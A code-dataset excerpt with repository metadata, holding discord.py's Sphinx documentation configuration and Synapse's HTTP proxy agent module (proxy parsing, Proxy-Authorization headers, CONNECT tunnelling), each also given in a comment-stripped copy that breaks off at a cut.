sec = time_delta.total_seconds()
hours, remainder = divmod(sec, 3600)
if round_to_hour:
if remainder >= 1800:
hours += 1
return str(int(hours))
minutes, remainder = divmod(remainder, 60)
return "{0:,d}:{1:02}".format(int(hours), int(minutes)).replace(',',' ')
else:
return '-'
def custom_redirect(url_name, *args, **kwargs):
from django.core.urlresolvers import reverse
from django.http import HttpResponseRedirect
from django.utils.http import urlencode
url = reverse(url_name, args=args)
params = urlencode(kwargs)
return HttpResponseRedirect(url + "?%s" % params)
| true | true |
f7193dc596182608b60c2744dd8a96f97d37ed2c | 11,229 | py | Python | docs/conf.py | jeromedontdev/discord.py | 42bab370a73440fa8af2380211ad92ccb6bf7f46 | [
"MIT"
] | 13 | 2020-12-16T06:13:11.000Z | 2021-04-15T12:01:38.000Z | docs/conf.py | RootGC/discord.py | 8bc489dba8b8c7ca9141e4e7f00a0e916a7c0269 | [
"MIT"
] | 1 | 2021-05-23T16:08:10.000Z | 2021-05-23T16:08:10.000Z | docs/conf.py | RootGC/discord.py | 8bc489dba8b8c7ca9141e4e7f00a0e916a7c0269 | [
"MIT"
] | 6 | 2020-12-16T00:01:24.000Z | 2021-02-05T12:32:54.000Z | #
# discord.py documentation build configuration file, created by
# sphinx-quickstart on Fri Aug 21 05:43:30 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import re
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('..'))
sys.path.append(os.path.abspath('extensions'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'builder',
'sphinx.ext.autodoc',
'sphinx.ext.extlinks',
'sphinx.ext.intersphinx',
'sphinx.ext.napoleon',
'sphinxcontrib_trio',
'details',
'exception_hierarchy',
'attributetable',
'resourcelinks',
'nitpick_file_ignorer',
]
autodoc_member_order = 'bysource'
autodoc_typehints = 'none'
extlinks = {
'issue': ('https://github.com/Rapptz/discord.py/issues/%s', 'GH-'),
}
# Links used for cross-referencing stuff in other documentation
intersphinx_mapping = {
'py': ('https://docs.python.org/3', None),
'aio': ('https://docs.aiohttp.org/en/stable/', None),
'req': ('https://docs.python-requests.org/en/latest/', None)
}
rst_prolog = """
.. |coro| replace:: This function is a |coroutine_link|_.
.. |maybecoro| replace:: This function *could be a* |coroutine_link|_.
.. |coroutine_link| replace:: *coroutine*
.. _coroutine_link: https://docs.python.org/3/library/asyncio-task.html#coroutine
"""
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'discord.py'
copyright = '2015-present, Rapptz'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = ''
with open('../discord/__init__.py') as f:
version = re.search(r'^__version__\s*=\s*[\'"]([^\'"]*)[\'"]', f.read(), re.MULTILINE).group(1)
# The full version, including alpha/beta/rc tags.
release = version
# This assumes a tag is available for final releases
branch = 'master' if version.endswith('a') else 'v' + version
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
locale_dirs = ['locale/']
gettext_compact = False
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'friendly'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# Nitpicky mode options
nitpick_ignore_files = [
"migrating_to_async",
"migrating",
"whats_new",
]
# -- Options for HTML output ----------------------------------------------
html_experimental_html5_writer = True
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'basic'
html_context = {
'discord_invite': 'https://discord.gg/r3sSKJJ',
'discord_extensions': [
('discord.ext.commands', 'ext/commands'),
('discord.ext.tasks', 'ext/tasks'),
],
}
resource_links = {
'discord': 'https://discord.gg/r3sSKJJ',
'issues': 'https://github.com/Rapptz/discord.py/issues',
'discussions': 'https://github.com/Rapptz/discord.py/discussions',
'examples': f'https://github.com/Rapptz/discord.py/tree/{branch}/examples',
}
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
# html_theme_options = {
# }
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
html_favicon = './images/discord_py_logo.ico'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
html_search_scorer = '_static/scorer.js'
html_js_files = [
'custom.js',
'settings.js',
'copy.js',
'sidebar.js'
]
# Output file base name for HTML help builder.
htmlhelp_basename = 'discord.pydoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index', 'discord.py.tex', 'discord.py Documentation',
'Rapptz', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'discord.py', 'discord.py Documentation',
['Rapptz'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'discord.py', 'discord.py Documentation',
'Rapptz', 'discord.py', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
def setup(app):
if app.config.language == 'ja':
app.config.intersphinx_mapping['py'] = ('https://docs.python.org/ja/3', None)
app.config.html_context['discord_invite'] = 'https://discord.gg/nXzj3dg'
app.config.resource_links['discord'] = 'https://discord.gg/nXzj3dg'
| 31.191667 | 99 | 0.708612 |
import sys
import os
import re
sys.path.insert(0, os.path.abspath('..'))
sys.path.append(os.path.abspath('extensions'))
extensions = [
'builder',
'sphinx.ext.autodoc',
'sphinx.ext.extlinks',
'sphinx.ext.intersphinx',
'sphinx.ext.napoleon',
'sphinxcontrib_trio',
'details',
'exception_hierarchy',
'attributetable',
'resourcelinks',
'nitpick_file_ignorer',
]
autodoc_member_order = 'bysource'
autodoc_typehints = 'none'
extlinks = {
'issue': ('https://github.com/Rapptz/discord.py/issues/%s', 'GH-'),
}
intersphinx_mapping = {
'py': ('https://docs.python.org/3', None),
'aio': ('https://docs.aiohttp.org/en/stable/', None),
'req': ('https://docs.python-requests.org/en/latest/', None)
}
rst_prolog = """
.. |coro| replace:: This function is a |coroutine_link|_.
.. |maybecoro| replace:: This function *could be a* |coroutine_link|_.
.. |coroutine_link| replace:: *coroutine*
.. _coroutine_link: https://docs.python.org/3/library/asyncio-task.html#coroutine
"""
templates_path = ['_templates']
source_suffix = '.rst'
master_doc = 'index'
project = 'discord.py'
copyright = '2015-present, Rapptz'
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = ''
with open('../discord/__init__.py') as f:
version = re.search(r'^__version__\s*=\s*[\'"]([^\'"]*)[\'"]', f.read(), re.MULTILINE).group(1)
# The full version, including alpha/beta/rc tags.
release = version
# This assumes a tag is available for final releases
branch = 'master' if version.endswith('a') else 'v' + version
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
locale_dirs = ['locale/']
gettext_compact = False
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'friendly'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# Nitpicky mode options
nitpick_ignore_files = [
"migrating_to_async",
"migrating",
"whats_new",
]
# -- Options for HTML output ----------------------------------------------
html_experimental_html5_writer = True
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'basic'
html_context = {
'discord_invite': 'https://discord.gg/r3sSKJJ',
'discord_extensions': [
('discord.ext.commands', 'ext/commands'),
('discord.ext.tasks', 'ext/tasks'),
],
}
resource_links = {
'discord': 'https://discord.gg/r3sSKJJ',
'issues': 'https://github.com/Rapptz/discord.py/issues',
'discussions': 'https://github.com/Rapptz/discord.py/discussions',
'examples': f'https://github.com/Rapptz/discord.py/tree/{branch}/examples',
}
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
# html_theme_options = {
# }
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
html_favicon = './images/discord_py_logo.ico'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
html_search_scorer = '_static/scorer.js'
html_js_files = [
'custom.js',
'settings.js',
'copy.js',
'sidebar.js'
]
# Output file base name for HTML help builder.
htmlhelp_basename = 'discord.pydoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index', 'discord.py.tex', 'discord.py Documentation',
'Rapptz', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'discord.py', 'discord.py Documentation',
['Rapptz'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'discord.py', 'discord.py Documentation',
'Rapptz', 'discord.py', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
def setup(app):
if app.config.language == 'ja':
app.config.intersphinx_mapping['py'] = ('https://docs.python.org/ja/3', None)
app.config.html_context['discord_invite'] = 'https://discord.gg/nXzj3dg'
app.config.resource_links['discord'] = 'https://discord.gg/nXzj3dg'
| true | true |
f7193e60bdbc11912523b4e6e6233bec11f0c404 | 11,846 | py | Python | synapse/http/proxyagent.py | User-green/synapse | 173ddbbe0b220bb28e67575079e1f775d73f967f | [
"Apache-2.0"
] | null | null | null | synapse/http/proxyagent.py | User-green/synapse | 173ddbbe0b220bb28e67575079e1f775d73f967f | [
"Apache-2.0"
] | null | null | null | synapse/http/proxyagent.py | User-green/synapse | 173ddbbe0b220bb28e67575079e1f775d73f967f | [
"Apache-2.0"
] | null | null | null | # Copyright 2019 The Matrix.org Foundation C.I.C.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import base64
import logging
import re
from typing import Optional, Tuple
from urllib.request import getproxies_environment, proxy_bypass_environment
import attr
from zope.interface import implementer
from twisted.internet import defer
from twisted.internet.endpoints import HostnameEndpoint, wrapClientTLS
from twisted.python.failure import Failure
from twisted.web.client import URI, BrowserLikePolicyForHTTPS, _AgentBase
from twisted.web.error import SchemeNotSupported
from twisted.web.http_headers import Headers
from twisted.web.iweb import IAgent, IPolicyForHTTPS
from synapse.http.connectproxyclient import HTTPConnectProxyEndpoint
logger = logging.getLogger(__name__)
_VALID_URI = re.compile(br"\A[\x21-\x7e]+\Z")
@attr.s
class ProxyCredentials:
username_password = attr.ib(type=bytes)
def as_proxy_authorization_value(self) -> bytes:
"""
Return the value for a Proxy-Authorization header (i.e. 'Basic abdef==').
Returns:
A transformation of the authentication string the encoded value for
a Proxy-Authorization header.
"""
# Encode as base64 and prepend the authorization type
return b"Basic " + base64.encodebytes(self.username_password)
@implementer(IAgent)
class ProxyAgent(_AgentBase):
"""An Agent implementation which will use an HTTP proxy if one was requested
Args:
reactor: twisted reactor to place outgoing
connections.
proxy_reactor: twisted reactor to use for connections to the proxy server
reactor might have some blacklisting applied (i.e. for DNS queries),
but we need unblocked access to the proxy.
contextFactory (IPolicyForHTTPS): A factory for TLS contexts, to control the
verification parameters of OpenSSL. The default is to use a
`BrowserLikePolicyForHTTPS`, so unless you have special
requirements you can leave this as-is.
connectTimeout (Optional[float]): The amount of time that this Agent will wait
for the peer to accept a connection, in seconds. If 'None',
HostnameEndpoint's default (30s) will be used.
This is used for connections to both proxies and destination servers.
bindAddress (bytes): The local address for client sockets to bind to.
pool (HTTPConnectionPool|None): connection pool to be used. If None, a
non-persistent pool instance will be created.
use_proxy (bool): Whether proxy settings should be discovered and used
from conventional environment variables.
"""
def __init__(
self,
reactor,
proxy_reactor=None,
contextFactory: Optional[IPolicyForHTTPS] = None,
connectTimeout=None,
bindAddress=None,
pool=None,
use_proxy=False,
):
contextFactory = contextFactory or BrowserLikePolicyForHTTPS()
_AgentBase.__init__(self, reactor, pool)
if proxy_reactor is None:
self.proxy_reactor = reactor
else:
self.proxy_reactor = proxy_reactor
self._endpoint_kwargs = {}
if connectTimeout is not None:
self._endpoint_kwargs["timeout"] = connectTimeout
if bindAddress is not None:
self._endpoint_kwargs["bindAddress"] = bindAddress
http_proxy = None
https_proxy = None
no_proxy = None
if use_proxy:
proxies = getproxies_environment()
http_proxy = proxies["http"].encode() if "http" in proxies else None
https_proxy = proxies["https"].encode() if "https" in proxies else None
no_proxy = proxies["no"] if "no" in proxies else None
# Parse credentials from http and https proxy connection string if present
self.http_proxy_creds, http_proxy = parse_username_password(http_proxy)
self.https_proxy_creds, https_proxy = parse_username_password(https_proxy)
self.http_proxy_endpoint = _http_proxy_endpoint(
http_proxy, self.proxy_reactor, **self._endpoint_kwargs
)
self.https_proxy_endpoint = _http_proxy_endpoint(
https_proxy, self.proxy_reactor, **self._endpoint_kwargs
)
self.no_proxy = no_proxy
self._policy_for_https = contextFactory
self._reactor = reactor
def request(self, method, uri, headers=None, bodyProducer=None):
"""
Issue a request to the server indicated by the given uri.
Supports `http` and `https` schemes.
An existing connection from the connection pool may be used or a new one may be
created.
See also: twisted.web.iweb.IAgent.request
Args:
method (bytes): The request method to use, such as `GET`, `POST`, etc
uri (bytes): The location of the resource to request.
headers (Headers|None): Extra headers to send with the request
bodyProducer (IBodyProducer|None): An object which can generate bytes to
make up the body of this request (for example, the properly encoded
contents of a file for a file upload). Or, None if the request is to
have no body.
Returns:
Deferred[IResponse]: completes when the header of the response has
been received (regardless of the response status code).
Can fail with:
SchemeNotSupported: if the uri is not http or https
twisted.internet.error.TimeoutError if the server we are connecting
to (proxy or destination) does not accept a connection before
connectTimeout.
... other things too.
"""
uri = uri.strip()
if not _VALID_URI.match(uri):
raise ValueError(f"Invalid URI {uri!r}")
parsed_uri = URI.fromBytes(uri)
pool_key = (parsed_uri.scheme, parsed_uri.host, parsed_uri.port)
request_path = parsed_uri.originForm
should_skip_proxy = False
if self.no_proxy is not None:
should_skip_proxy = proxy_bypass_environment(
parsed_uri.host.decode(),
proxies={"no": self.no_proxy},
)
if (
parsed_uri.scheme == b"http"
and self.http_proxy_endpoint
and not should_skip_proxy
):
# Determine whether we need to set Proxy-Authorization headers
if self.http_proxy_creds:
# Set a Proxy-Authorization header
if headers is None:
headers = Headers()
headers.addRawHeader(
b"Proxy-Authorization",
self.http_proxy_creds.as_proxy_authorization_value(),
)
# Cache *all* connections under the same key, since we are only
# connecting to a single destination, the proxy:
pool_key = ("http-proxy", self.http_proxy_endpoint)
endpoint = self.http_proxy_endpoint
request_path = uri
elif (
parsed_uri.scheme == b"https"
and self.https_proxy_endpoint
and not should_skip_proxy
):
connect_headers = Headers()
# Determine whether we need to set Proxy-Authorization headers
if self.https_proxy_creds:
# Set a Proxy-Authorization header
connect_headers.addRawHeader(
b"Proxy-Authorization",
self.https_proxy_creds.as_proxy_authorization_value(),
)
endpoint = HTTPConnectProxyEndpoint(
self.proxy_reactor,
self.https_proxy_endpoint,
parsed_uri.host,
parsed_uri.port,
headers=connect_headers,
)
else:
# not using a proxy
endpoint = HostnameEndpoint(
self._reactor, parsed_uri.host, parsed_uri.port, **self._endpoint_kwargs
)
logger.debug("Requesting %s via %s", uri, endpoint)
if parsed_uri.scheme == b"https":
tls_connection_creator = self._policy_for_https.creatorForNetloc(
parsed_uri.host, parsed_uri.port
)
endpoint = wrapClientTLS(tls_connection_creator, endpoint)
elif parsed_uri.scheme == b"http":
pass
else:
return defer.fail(
Failure(
SchemeNotSupported("Unsupported scheme: %r" % (parsed_uri.scheme,))
)
)
return self._requestWithEndpoint(
pool_key, endpoint, method, parsed_uri, headers, bodyProducer, request_path
)
def _http_proxy_endpoint(proxy: Optional[bytes], reactor, **kwargs):
"""Parses an http proxy setting and returns an endpoint for the proxy
Args:
proxy: the proxy setting in the form: [<username>:<password>@]<host>[:<port>]
Note that compared to other apps, this function currently lacks support
for specifying a protocol schema (i.e. protocol://...).
reactor: reactor to be used to connect to the proxy
kwargs: other args to be passed to HostnameEndpoint
Returns:
interfaces.IStreamClientEndpoint|None: endpoint to use to connect to the proxy,
or None
"""
if proxy is None:
return None
# Parse the connection string
host, port = parse_host_port(proxy, default_port=1080)
return HostnameEndpoint(reactor, host, port, **kwargs)
def parse_username_password(proxy: bytes) -> Tuple[Optional[ProxyCredentials], bytes]:
"""
Parses the username and password from a proxy declaration e.g
username:password@hostname:port.
Args:
proxy: The proxy connection string.
Returns
An instance of ProxyCredentials and the proxy connection string with any credentials
stripped, i.e u:p@host:port -> host:port. If no credentials were found, the
ProxyCredentials instance is replaced with None.
"""
if proxy and b"@" in proxy:
# We use rsplit here as the password could contain an @ character
credentials, proxy_without_credentials = proxy.rsplit(b"@", 1)
return ProxyCredentials(credentials), proxy_without_credentials
return None, proxy
def parse_host_port(hostport: bytes, default_port: int = None) -> Tuple[bytes, int]:
"""
Parse the hostname and port from a proxy connection byte string.
Args:
hostport: The proxy connection string. Must be in the form 'host[:port]'.
default_port: The default port to return if one is not found in `hostport`.
Returns:
A tuple containing the hostname and port. Uses `default_port` if one was not found.
"""
if b":" in hostport:
host, port = hostport.rsplit(b":", 1)
try:
port = int(port)
return host, port
except ValueError:
# the thing after the : wasn't a valid port; presumably this is an
# IPv6 address.
pass
return hostport, default_port
| 36.674923 | 92 | 0.639878 |
import base64
import logging
import re
from typing import Optional, Tuple
from urllib.request import getproxies_environment, proxy_bypass_environment
import attr
from zope.interface import implementer
from twisted.internet import defer
from twisted.internet.endpoints import HostnameEndpoint, wrapClientTLS
from twisted.python.failure import Failure
from twisted.web.client import URI, BrowserLikePolicyForHTTPS, _AgentBase
from twisted.web.error import SchemeNotSupported
from twisted.web.http_headers import Headers
from twisted.web.iweb import IAgent, IPolicyForHTTPS
from synapse.http.connectproxyclient import HTTPConnectProxyEndpoint
logger = logging.getLogger(__name__)
_VALID_URI = re.compile(br"\A[\x21-\x7e]+\Z")
@attr.s
class ProxyCredentials:
username_password = attr.ib(type=bytes)
def as_proxy_authorization_value(self) -> bytes:
return b"Basic " + base64.encodebytes(self.username_password)
@implementer(IAgent)
class ProxyAgent(_AgentBase):
def __init__(
self,
reactor,
proxy_reactor=None,
contextFactory: Optional[IPolicyForHTTPS] = None,
connectTimeout=None,
bindAddress=None,
pool=None,
use_proxy=False,
):
contextFactory = contextFactory or BrowserLikePolicyForHTTPS()
_AgentBase.__init__(self, reactor, pool)
if proxy_reactor is None:
self.proxy_reactor = reactor
else:
self.proxy_reactor = proxy_reactor
self._endpoint_kwargs = {}
if connectTimeout is not None:
self._endpoint_kwargs["timeout"] = connectTimeout
if bindAddress is not None:
self._endpoint_kwargs["bindAddress"] = bindAddress
http_proxy = None
https_proxy = None
no_proxy = None
if use_proxy:
proxies = getproxies_environment()
http_proxy = proxies["http"].encode() if "http" in proxies else None
https_proxy = proxies["https"].encode() if "https" in proxies else None
no_proxy = proxies["no"] if "no" in proxies else None
self.http_proxy_creds, http_proxy = parse_username_password(http_proxy)
self.https_proxy_creds, https_proxy = parse_username_password(https_proxy)
self.http_proxy_endpoint = _http_proxy_endpoint(
http_proxy, self.proxy_reactor, **self._endpoint_kwargs
)
self.https_proxy_endpoint = _http_proxy_endpoint(
https_proxy, self.proxy_reactor, **self._endpoint_kwargs
)
self.no_proxy = no_proxy
self._policy_for_https = contextFactory
self._reactor = reactor
def request(self, method, uri, headers=None, bodyProducer=None):
uri = uri.strip()
if not _VALID_URI.match(uri):
raise ValueError(f"Invalid URI {uri!r}")
parsed_uri = URI.fromBytes(uri)
pool_key = (parsed_uri.scheme, parsed_uri.host, parsed_uri.port)
request_path = parsed_uri.originForm
should_skip_proxy = False
if self.no_proxy is not None:
should_skip_proxy = proxy_bypass_environment(
parsed_uri.host.decode(),
proxies={"no": self.no_proxy},
)
if (
parsed_uri.scheme == b"http"
and self.http_proxy_endpoint
and not should_skip_proxy
):
if self.http_proxy_creds:
if headers is None:
headers = Headers()
headers.addRawHeader(
b"Proxy-Authorization",
self.http_proxy_creds.as_proxy_authorization_value(),
)
pool_key = ("http-proxy", self.http_proxy_endpoint)
endpoint = self.http_proxy_endpoint
request_path = uri
elif (
parsed_uri.scheme == b"https"
and self.https_proxy_endpoint
and not should_skip_proxy
):
connect_headers = Headers()
if self.https_proxy_creds:
connect_headers.addRawHeader(
b"Proxy-Authorization",
self.https_proxy_creds.as_proxy_authorization_value(),
)
endpoint = HTTPConnectProxyEndpoint(
self.proxy_reactor,
self.https_proxy_endpoint,
parsed_uri.host,
parsed_uri.port,
headers=connect_headers,
)
else:
endpoint = HostnameEndpoint(
self._reactor, parsed_uri.host, parsed_uri.port, **self._endpoint_kwargs
)
logger.debug("Requesting %s via %s", uri, endpoint)
if parsed_uri.scheme == b"https":
tls_connection_creator = self._policy_for_https.creatorForNetloc(
parsed_uri.host, parsed_uri.port
)
endpoint = wrapClientTLS(tls_connection_creator, endpoint)
elif parsed_uri.scheme == b"http":
pass
else:
return defer.fail(
Failure(
SchemeNotSupported("Unsupported scheme: %r" % (parsed_uri.scheme,))
)
)
return self._requestWithEndpoint(
pool_key, endpoint, method, parsed_uri, headers, bodyProducer, request_path
)
def _http_proxy_endpoint(proxy: Optional[bytes], reactor, **kwargs):
if proxy is None:
return None
host, port = parse_host_port(proxy, default_port=1080)
return HostnameEndpoint(reactor, host, port, **kwargs)
def parse_username_password(proxy: bytes) -> Tuple[Optional[ProxyCredentials], bytes]:
if proxy and b"@" in proxy:
credentials, proxy_without_credentials = proxy.rsplit(b"@", 1)
return ProxyCredentials(credentials), proxy_without_credentials
return None, proxy
def parse_host_port(hostport: bytes, default_port: int = None) -> Tuple[bytes, int]:
